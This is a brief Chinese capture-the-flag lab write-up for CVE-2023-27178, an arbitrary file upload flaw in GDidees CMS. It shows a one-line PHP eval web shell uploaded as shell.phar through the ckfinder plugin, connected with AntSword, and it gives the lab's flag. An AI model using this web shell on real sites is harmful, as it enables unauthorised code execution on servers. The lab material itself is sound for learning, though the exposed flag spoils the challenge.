[春秋云镜] CVE-2023-27178
靶标介绍:
GDidees CMS 3.9.1及以下版本存在任意文件上传漏洞漏洞,允许未经授权的攻击者上传精心构造的文件并执行任意代码
1、访问Roxy Fileman插件页面
http://eci-2zeam0bkasme9whmcqzp.cloudeci1.ichunqiu.com/_admin/ckeditor/plugins/ckfinder/index.php#
2、点击上传upload按钮,上传写好的一句话木马shell.phar,内容如下:
<?php @eval($_POST[sb]);?>
3、点开上传的文件shell.phar,发现可以执行。连接蚁剑。
4、在根目录找到flag
flag{d5082e5c-e140-43fb-bbe8-651cf7b587bf}